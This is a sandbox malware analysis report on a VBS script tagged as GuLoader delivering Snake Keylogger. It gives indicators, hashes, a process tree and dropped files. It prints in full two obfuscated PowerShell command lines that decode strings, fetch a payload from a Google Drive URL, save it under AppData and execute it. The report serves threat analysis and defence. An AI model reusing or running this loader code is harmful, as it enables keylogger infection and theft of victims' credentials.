Malware analysis att1-241104022450_PDF.vbs Malicious activity

Add for printing

File name:	att1-241104022450_PDF.vbs
Full analysis:	https://app.any.run/tasks/f786d190-91e9-4b2e-812f-55e6db56ba02
Verdict:	Malicious activity
Threats:	A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. Malware Trends Tracker >>>
Analysis date:	November 04, 2024, 15:25:59
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	gumen evasion snake keylogger telegram
Indicators:
MIME:	text/plain
File info:	ASCII text, with CRLF line terminators
MD5:	9D2F1B9D85E014524C2C596D60B0E4C7
SHA1:	9C4798635E685841EA77BF887CBB32BB200A0CDD
SHA256:	6819EDE9FDD746E4B94B591EBD20904BBB0B065C2A20E3F606951147C04E77E5
SSDEEP:	768:TODAJEvQefRV0/9QPrhPg691+xggNK5Is:8jvNZV0arV7H+xJNK5Is

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- GUMEN has been detected
  - powershell.exe (PID: 7344)
  - powershell.exe (PID: 8164)
SUSPICIOUS
- Suspicious use of symmetric encryption in PowerShell
  - wscript.exe (PID: 3788)
- Starts POWERSHELL.EXE for commands execution
  - wscript.exe (PID: 3788)
INFO
- Creates or changes the value of an item property via Powershell
  - wscript.exe (PID: 3788)
- Manual execution by a user
  - powershell.exe (PID: 8164)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

135

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

3788

"C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\att1-241104022450_PDF.vbs

C:\Windows\System32\wscript.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft ® Windows Based Script Host

Exit code:

Version:

5.812.10240.16384

Modules

Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

4692

"C:\WINDOWS\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\msiexec.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows® installer

Version:

5.0.19041.3636 (WinBuild.160101.0800)

7344

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#animando Actinotoxemia Gallstones Afholdsloge misdisposition Semioccasionally #>;$Altngle='Samordninger';<#Cynipidae Edvinds Utrsteliges Tridacna Befuldmgtigelsers Logaritmes Reobligation #>; function Guiders($Undgldelsens){If ($host.DebuggerEnabled) {$Alkide++;}$Amarevole=$Prelingually+$Undgldelsens.'Length' - $Alkide; for ( $Acidoses=5;$Acidoses -lt $Amarevole;$Acidoses+=6){$Careener=$Acidoses;$Germens+=$Undgldelsens[$Acidoses];}$Germens;}function Slanderousness($slalomkrslers){ . ($Mutineered) ($slalomkrslers);}$Unstaid=Guiders ' NeonMDi,jaoMarthzVestmiJu iolUfejll FjeraSmaas/ Hels ';$Bastionens=Guiders 'HjertT Iti.lJackssSonan1Espie2Munke ';$Sandbundens='Til,u[TosheN Phy ePrve,t Vert.Ind lS Bi.me OverR NsecvPre iiUkrnkcSkyliESpecipLune,OFolkei SkolN ewartAbecembettiaRaadsnFi.msATelefGEkspeEDys orEdeni] U.co:Glimr:Afb nsUdva,eBes,iC DiasuNoncor TotaiSalvetUnderYTaphapSvejerM.cadOSkrumt uncooOecopCMde ooB kkaLKeck =Octav$ laprBGestiaFlkhaSbremsTSedesiUncoqoStereNT,gelePsychnomlagsRe to ';$Unstaid+=Guiders ' Synk5Stalw.Slyng0 Pelt En in(DivinWAfstaihy ocnKviltdPrimno P.ysw KurssBi.te MonoNInsisT onpu Oppre1phren0isenk.Rudde0S rco;De,og Mil,iWSedimiStipunDerog6 arko4Subma;Glyce laasxIndle6Libel4Archc;Heste Nondir ErnrvChro.:.ente1Conco3 Lon,1Hyena.Udban0Reek )Medic MilieGDisameCrokicVinhsk pasmoEryth/Fibri2 red0O.spa1Joyho0 Pele0Plnen1Origi0Putne1Recol DagreF S rsiSolnerForele Ga.gf Menso,armox Uerh/Flere1Oriel3Funkt1Inboa.Murex0Br nk ';$stagiritic=Guiders 'TetraU El rSRatteeIn erRMalad-terpeA TendGSephiE Di nNRevenTSmadd ';$Unlustrously=Guiders 'PawschshingtAdmirt Queap Luncs W le: tag/Tuba./UnreqdUrinartilsyiKlamrvSolose Vaku.Tils gMillwo Vrdio SchogBedril MenueKagef.Spru,c MarioAntigmDeepw/En omuDumpec Sten?HumaneFr.stx KryppMot co OpinrHypert Tank= asudBlodpoBaaduw uthynlsegllBil roCyk.laB.affdOverc&PictuiSweltdSkyts=Uncat1MarryUUnsup_ RettrLkke aDisjuhKejs QA,ensbBramfK reggSRioti7Pattyv RaadDHypni7JailhQPersoq.ilkmcOdyss6SarkaWFljlsXIndus3 ove,gReconX.mbinnAlvinjStym,xGarboTP.etefCillaqDec.mR InstZinterb ouldp kab ';$Geophilidae238=Guiders 'Salpe>Promp ';$Mutineered=Guiders 'KvindIEndone Li sxLindi ';$Myrmecobine='Overtediousness';$Vocatives='\Staalstukknes.Adv';Slanderousness (Guiders 'stryk$NetstgTrlaslPromeOUforbb ,tyraG.ldbLSmaas:Antica R fln .dkmTbernyI Til.pgimbahRehallResawoPeroxgGopurI PinkS dangt Spali NondCH rry=Nemer$SnyltEove hn AnlbVUd ld:.ransa hogPPidgip EthadEpisaABridlTBlaweARalst+Dia o$S,nsaVHype OFimbucDyrk aBegreTAlamoIEnddav algbEFre.eSGumme ');Slanderousness (Guiders 'fragm$U ffigTeleuLDela oRenhaBPers AMagt L sop: PollbUninsLP oteU H lbSImpresTrikoE VolanUnenkEInstr=Eft,r$AutorUNoncrnHftenLelastuDermasAdmi,tBifleRBankfoSoaryu yrebSF,rreL,nstrYFrdse.Arbors ChilPafri,lNomneiLiriptOvera(Prve $Ca esGStripeM einOUdk kPRenumhPigheIA errLPetraISmockDservoAElec eFaerd2Semin3Nonin8Later)Med,l ');Slanderousness (Guiders $Sandbundens);$Unlustrously=$blussene[0];$Mediekommissionenens=(Guiders 'Fei n$Valetg,onesLDefolO ParcB risgADadail Tera:DomsaS Und JIrrecAJ rdsvSuperS aurie CoerNviske=CanciNLimacEKalorwAcc m- ArbiOY llobUd ytjLabideStodgc Y,geT Coe, SamsSInforY UnspSPreadTChaptEF uviMDrg,i.BrushNBetreESi ent Poly.FifleWsp aeEEd caBF avlC KharlKaotiiAbridEMleaonSum atHydro ');Slanderousness ($Mediekommissionenens);Slanderousness (Guiders 'unbuc$WalesSRigeljStoddaCentrvmusetsqua reA,omknKdham.SixinHS,lene Ompla Un cdStavbeTuskhrTillosAud t[Unifo$Er ans kkert inteaStorhgNascaiafs.rrUnconiVindetNonwoiForl cForti]Kibbl=Dendr$TrsniU Si,dnPrismstidsitCruoraFornui Gua.dEnt.r ');$Psychiater=Guiders ' Pejl$Fa etS rookjAcr,ma Lib vSs ansKnebse isconPozzy.Pe siDgauk oProcowStee nDoltclSkjorotra kaStedfdBundlFHoteli emoglStil.eR fry(Under$Fej.pU.eukmnPeerelDatabuMassesblgebtstandrBijo oFrembu SlgesKulkllMicroyFlint,Ramif$HydroNDiscooOrthotVarm eS.ppebRhinoo BagagPealesReco )Hdlci ';$Notebogs=$Antiphlogistic;Slanderousness (Guiders 'Minif$OpgavGT aralCuir oUns db Sn.eAGenr LSalpi:TampoDHandeO puneBCannoBBeflaE DigtlStraatKursueVa ilKOvertsScrufpflos,OSu ranGavtyeDeprerDe onIFluxiNDiscaG Kilo= titl( Okset UnatEindisSLuft tMetap-UslinPLimouaBelysTCoasth.ewre S.des$UnrhyN RekooBldgrtT kkeEC.ssebCo juOEn angGrundsStewa)Paper ');while (!$Dobbelteksponering) {Slanderousness (Guiders 'Vocti$SemifgApinol GrueoAt.olbmdep aSporal.kndi:Sor cGL mpeeInappnrituafGnavedkommus IodieRa,salBaand=Terma$ve.sitOpr sr T eauFingeeDecep ') ;Slanderousness $Psychiater;Slanderousness (Guiders 'SrinasD aleTGlauxaCountr awnt Skbn- Ind.sUdkl.LChokeeTwistE UninpSlims Snowb4Trog, ');Slanderousness (Guiders 'Hyper$ AraiGB.rtfLMeldsOAraisbfedteA .awaLOv rm:SaltidEr siOV korB.migrb indvEgrindLUndert StriEToninkSpirisSeksepMisgooUdblsnSammeEDroplRDiapnIBom rNca itg trlk=Ligeg(VuggetSne.le ThraSAlwinT Hjel-KashaP mrinAStipuTFo brHTradu Tuber$BundgN VeniO,ermot Ljere .atrBRetteOSali GFl.shsVandb)Clari ') ;Slanderousness (Guiders ' Genf$BibligCostaLS ropoOpd tBSkridADkstol Wind:PresbvSovebDMyggee SlagLHatchsRapsoe ilen=Plais$ Gr nGHornfL ArbeO StupB B tia PictLNagu : TarvBsirenlFindeoRebs MDoebesDwo.tT TerrEP.ultnPal,d+Kolon+Kont,%tonea$magerbPlastLBiznau RigssBr nkSSrge EKrusensuperEextr,.Arrakc.ackeoLektiUSkattNKonceTNonid ') ;$Unlustrously=$blussene[$Vdelse];}$Semipatriotic=285226;$Kompetenceomraades=31982;Slanderousness (Guiders 'Vo os$Ur.nbgGodv,LNeofao SeizbAnl,nAO.erhLRea a:NosolBTegntEO.eane SkabH inteiProgrvVedrre ,rit Byret=Mod,f Specg Di yeOnomaTTraff-Le tocSuk,eoD alen,impetBallyebristnDouriT Baty verm$ungskNPlakaO RentTHageseWelasB Oi,toR nebGUnco s Stre ');Slanderousness (Guiders 'Ontax$Fritig Oli lOktavoStinabPerleaP,edolOmlgg:JustiBBesvra ssinbScootiGud ar hiapuVildfs Spu sKursuaK use Udsen= .hth Oilom[DomesSDiatoyPuppes ChemtAtlaseFlakemanve .ParapCChairoA,cusn Da.kvKindbeLatinr HvidtNorth]Nital: oeli:BnkebF einsrMarkroLandsmProp,BMil vaRusposS ambeCasti6Is.re4TabelSVognstStignrkeratiNatannPi,stgMa ur( Asto$BinomBEnsheeDo.nceClarahS ottiPopulvUtrttePro,u) sogr ');Slanderousness (Guiders 'mamlu$P udigFourilP,adeoPrep B p asALuknil rund:ForsaNAlvasISmoggT.egioE D muNGlidec TurnY kunz Nerve=Energ Emul[Favi s ForfYAfsbnsFluidt Potsetet aME,sis.SociotFi,trEunridX eateT Kont.Ide te Hy rN UnaccMarioO,hotod NayaI achiNCy,noGFrikt]Sge m:Elfor:Ov.rgABulloSPriorCSpireIVa meiAfsvk.HebecG orpleFuldkTDoktosSwa,tTGilleR UdpniHippen Rea.gFo es( rnne$ Inj.BRhemiaLeverBPseu IMorgeRLa,rdUDecoss ootsS.claiaKend )Camio ');Slanderousness (Guiders ' Unro$ arbeGspionLDjvl,o LaagBUdfleamisbiLFlipp:Pref k utooiunsurmSaedvoOrthoN corvo CoheEOe,opRExhumnUdsuleRehob=Retab$FrergnD,lthIGangftFlam EFor en,odric AfpaYPens . HeksSS.etoUKly.eBMc orsOpflatD renR ortsiOdoseNTum.fGKlren( Krau$ AfhnSTosseeExtram ZirkiDile.PEperoa Ve.dtHypogRHuma.I Sta OS,emaTVi,keI Be,uC Bar ,Silab$DentaK ZinnOSpndimBehanpCestoeA.quitSpejdedobbeNTruttCfebriENdvenOBedcaMIndifR,psoaA Wep.aRadikdKoedceNdvens Vand)Fu,ts ');Slanderousness $Kimonoerne;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

wscript.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

7352

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

8164

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#animando Actinotoxemia Gallstones Afholdsloge misdisposition Semioccasionally #>;$Altngle='Samordninger';<#Cynipidae Edvinds Utrsteliges Tridacna Befuldmgtigelsers Logaritmes Reobligation #>; function Guiders($Undgldelsens){If ($host.DebuggerEnabled) {$Alkide++;}$Amarevole=$Prelingually+$Undgldelsens.'Length' - $Alkide; for ( $Acidoses=5;$Acidoses -lt $Amarevole;$Acidoses+=6){$Careener=$Acidoses;$Germens+=$Undgldelsens[$Acidoses];}$Germens;}function Slanderousness($slalomkrslers){ . ($Mutineered) ($slalomkrslers);}$Unstaid=Guiders ' NeonMDi,jaoMarthzVestmiJu iolUfejll FjeraSmaas/ Hels ';$Bastionens=Guiders 'HjertT Iti.lJackssSonan1Espie2Munke ';$Sandbundens='Til,u[TosheN Phy ePrve,t Vert.Ind lS Bi.me OverR NsecvPre iiUkrnkcSkyliESpecipLune,OFolkei SkolN ewartAbecembettiaRaadsnFi.msATelefGEkspeEDys orEdeni] U.co:Glimr:Afb nsUdva,eBes,iC DiasuNoncor TotaiSalvetUnderYTaphapSvejerM.cadOSkrumt uncooOecopCMde ooB kkaLKeck =Octav$ laprBGestiaFlkhaSbremsTSedesiUncoqoStereNT,gelePsychnomlagsRe to ';$Unstaid+=Guiders ' Synk5Stalw.Slyng0 Pelt En in(DivinWAfstaihy ocnKviltdPrimno P.ysw KurssBi.te MonoNInsisT onpu Oppre1phren0isenk.Rudde0S rco;De,og Mil,iWSedimiStipunDerog6 arko4Subma;Glyce laasxIndle6Libel4Archc;Heste Nondir ErnrvChro.:.ente1Conco3 Lon,1Hyena.Udban0Reek )Medic MilieGDisameCrokicVinhsk pasmoEryth/Fibri2 red0O.spa1Joyho0 Pele0Plnen1Origi0Putne1Recol DagreF S rsiSolnerForele Ga.gf Menso,armox Uerh/Flere1Oriel3Funkt1Inboa.Murex0Br nk ';$stagiritic=Guiders 'TetraU El rSRatteeIn erRMalad-terpeA TendGSephiE Di nNRevenTSmadd ';$Unlustrously=Guiders 'PawschshingtAdmirt Queap Luncs W le: tag/Tuba./UnreqdUrinartilsyiKlamrvSolose Vaku.Tils gMillwo Vrdio SchogBedril MenueKagef.Spru,c MarioAntigmDeepw/En omuDumpec Sten?HumaneFr.stx KryppMot co OpinrHypert Tank= asudBlodpoBaaduw uthynlsegllBil roCyk.laB.affdOverc&PictuiSweltdSkyts=Uncat1MarryUUnsup_ RettrLkke aDisjuhKejs QA,ensbBramfK reggSRioti7Pattyv RaadDHypni7JailhQPersoq.ilkmcOdyss6SarkaWFljlsXIndus3 ove,gReconX.mbinnAlvinjStym,xGarboTP.etefCillaqDec.mR InstZinterb ouldp kab ';$Geophilidae238=Guiders 'Salpe>Promp ';$Mutineered=Guiders 'KvindIEndone Li sxLindi ';$Myrmecobine='Overtediousness';$Vocatives='\Staalstukknes.Adv';Slanderousness (Guiders 'stryk$NetstgTrlaslPromeOUforbb ,tyraG.ldbLSmaas:Antica R fln .dkmTbernyI Til.pgimbahRehallResawoPeroxgGopurI PinkS dangt Spali NondCH rry=Nemer$SnyltEove hn AnlbVUd ld:.ransa hogPPidgip EthadEpisaABridlTBlaweARalst+Dia o$S,nsaVHype OFimbucDyrk aBegreTAlamoIEnddav algbEFre.eSGumme ');Slanderousness (Guiders 'fragm$U ffigTeleuLDela oRenhaBPers AMagt L sop: PollbUninsLP oteU H lbSImpresTrikoE VolanUnenkEInstr=Eft,r$AutorUNoncrnHftenLelastuDermasAdmi,tBifleRBankfoSoaryu yrebSF,rreL,nstrYFrdse.Arbors ChilPafri,lNomneiLiriptOvera(Prve $Ca esGStripeM einOUdk kPRenumhPigheIA errLPetraISmockDservoAElec eFaerd2Semin3Nonin8Later)Med,l ');Slanderousness (Guiders $Sandbundens);$Unlustrously=$blussene[0];$Mediekommissionenens=(Guiders 'Fei n$Valetg,onesLDefolO ParcB risgADadail Tera:DomsaS Und JIrrecAJ rdsvSuperS aurie CoerNviske=CanciNLimacEKalorwAcc m- ArbiOY llobUd ytjLabideStodgc Y,geT Coe, SamsSInforY UnspSPreadTChaptEF uviMDrg,i.BrushNBetreESi ent Poly.FifleWsp aeEEd caBF avlC KharlKaotiiAbridEMleaonSum atHydro ');Slanderousness ($Mediekommissionenens);Slanderousness (Guiders 'unbuc$WalesSRigeljStoddaCentrvmusetsqua reA,omknKdham.SixinHS,lene Ompla Un cdStavbeTuskhrTillosAud t[Unifo$Er ans kkert inteaStorhgNascaiafs.rrUnconiVindetNonwoiForl cForti]Kibbl=Dendr$TrsniU Si,dnPrismstidsitCruoraFornui Gua.dEnt.r ');$Psychiater=Guiders ' Pejl$Fa etS rookjAcr,ma Lib vSs ansKnebse isconPozzy.Pe siDgauk oProcowStee nDoltclSkjorotra kaStedfdBundlFHoteli emoglStil.eR fry(Under$Fej.pU.eukmnPeerelDatabuMassesblgebtstandrBijo oFrembu SlgesKulkllMicroyFlint,Ramif$HydroNDiscooOrthotVarm eS.ppebRhinoo BagagPealesReco )Hdlci ';$Notebogs=$Antiphlogistic;Slanderousness (Guiders 'Minif$OpgavGT aralCuir oUns db Sn.eAGenr LSalpi:TampoDHandeO puneBCannoBBeflaE DigtlStraatKursueVa ilKOvertsScrufpflos,OSu ranGavtyeDeprerDe onIFluxiNDiscaG Kilo= titl( Okset UnatEindisSLuft tMetap-UslinPLimouaBelysTCoasth.ewre S.des$UnrhyN RekooBldgrtT kkeEC.ssebCo juOEn angGrundsStewa)Paper ');while (!$Dobbelteksponering) {Slanderousness (Guiders 'Vocti$SemifgApinol GrueoAt.olbmdep aSporal.kndi:Sor cGL mpeeInappnrituafGnavedkommus IodieRa,salBaand=Terma$ve.sitOpr sr T eauFingeeDecep ') ;Slanderousness $Psychiater;Slanderousness (Guiders 'SrinasD aleTGlauxaCountr awnt Skbn- Ind.sUdkl.LChokeeTwistE UninpSlims Snowb4Trog, ');Slanderousness (Guiders 'Hyper$ AraiGB.rtfLMeldsOAraisbfedteA .awaLOv rm:SaltidEr siOV korB.migrb indvEgrindLUndert StriEToninkSpirisSeksepMisgooUdblsnSammeEDroplRDiapnIBom rNca itg trlk=Ligeg(VuggetSne.le ThraSAlwinT Hjel-KashaP mrinAStipuTFo brHTradu Tuber$BundgN VeniO,ermot Ljere .atrBRetteOSali GFl.shsVandb)Clari ') ;Slanderousness (Guiders ' Genf$BibligCostaLS ropoOpd tBSkridADkstol Wind:PresbvSovebDMyggee SlagLHatchsRapsoe ilen=Plais$ Gr nGHornfL ArbeO StupB B tia PictLNagu : TarvBsirenlFindeoRebs MDoebesDwo.tT TerrEP.ultnPal,d+Kolon+Kont,%tonea$magerbPlastLBiznau RigssBr nkSSrge EKrusensuperEextr,.Arrakc.ackeoLektiUSkattNKonceTNonid ') ;$Unlustrously=$blussene[$Vdelse];}$Semipatriotic=285226;$Kompetenceomraades=31982;Slanderousness (Guiders 'Vo os$Ur.nbgGodv,LNeofao SeizbAnl,nAO.erhLRea a:NosolBTegntEO.eane SkabH inteiProgrvVedrre ,rit Byret=Mod,f Specg Di yeOnomaTTraff-Le tocSuk,eoD alen,impetBallyebristnDouriT Baty verm$ungskNPlakaO RentTHageseWelasB Oi,toR nebGUnco s Stre ');Slanderousness (Guiders 'Ontax$Fritig Oli lOktavoStinabPerleaP,edolOmlgg:JustiBBesvra ssinbScootiGud ar hiapuVildfs Spu sKursuaK use Udsen= .hth Oilom[DomesSDiatoyPuppes ChemtAtlaseFlakemanve .ParapCChairoA,cusn Da.kvKindbeLatinr HvidtNorth]Nital: oeli:BnkebF einsrMarkroLandsmProp,BMil vaRusposS ambeCasti6Is.re4TabelSVognstStignrkeratiNatannPi,stgMa ur( Asto$BinomBEnsheeDo.nceClarahS ottiPopulvUtrttePro,u) sogr ');Slanderousness (Guiders 'mamlu$P udigFourilP,adeoPrep B p asALuknil rund:ForsaNAlvasISmoggT.egioE D muNGlidec TurnY kunz Nerve=Energ Emul[Favi s ForfYAfsbnsFluidt Potsetet aME,sis.SociotFi,trEunridX eateT Kont.Ide te Hy rN UnaccMarioO,hotod NayaI achiNCy,noGFrikt]Sge m:Elfor:Ov.rgABulloSPriorCSpireIVa meiAfsvk.HebecG orpleFuldkTDoktosSwa,tTGilleR UdpniHippen Rea.gFo es( rnne$ Inj.BRhemiaLeverBPseu IMorgeRLa,rdUDecoss ootsS.claiaKend )Camio ');Slanderousness (Guiders ' Unro$ arbeGspionLDjvl,o LaagBUdfleamisbiLFlipp:Pref k utooiunsurmSaedvoOrthoN corvo CoheEOe,opRExhumnUdsuleRehob=Retab$FrergnD,lthIGangftFlam EFor en,odric AfpaYPens . HeksSS.etoUKly.eBMc orsOpflatD renR ortsiOdoseNTum.fGKlren( Krau$ AfhnSTosseeExtram ZirkiDile.PEperoa Ve.dtHypogRHuma.I Sta OS,emaTVi,keI Be,uC Bar ,Silab$DentaK ZinnOSpndimBehanpCestoeA.quitSpejdedobbeNTruttCfebriENdvenOBedcaMIndifR,psoaA Wep.aRadikdKoedceNdvens Vand)Fu,ts ');Slanderousness $Kimonoerne;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll

8172

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

Add for printing

Total events

13 538

Read events

13 538

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
7344	powershell.exe	C:\Users\admin\AppData\Roaming\Staalstukknes.Adv		text
		MD5:3B03CE3B8AADD6190102AAB58A22DEB2	SHA256:EA5B83F57BDDA9935D5268DE550601C86971D7C145D1053653C78256B01575E0
7344	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zbxuwddw.rdg.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8164	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_b403bo0g.yia.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4692	msiexec.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199		binary
		MD5:3BFBDFBB2381B904B9DE5D174E895339	SHA256:5E23E635F9BD1331C1142C1997EF68F93030AC789CED45268D83BCC9ADC1BAD5
7344	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uhu3iv5t.qyx.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7344	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive		binary
		MD5:AA2549AD09D04E493F218E6B55AA7466	SHA256:19308038874734E4F3B2B5290EAB8D2BD7DDD94DA4D743AA579838C9245583B4
4692	msiexec.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7		der
		MD5:403A1E7BC004B872E35565934281C0C0	SHA256:B9187C9D1611F145F2DC795D981A21EC7CA6DD97E0887A0A0AE708E14510B9CB
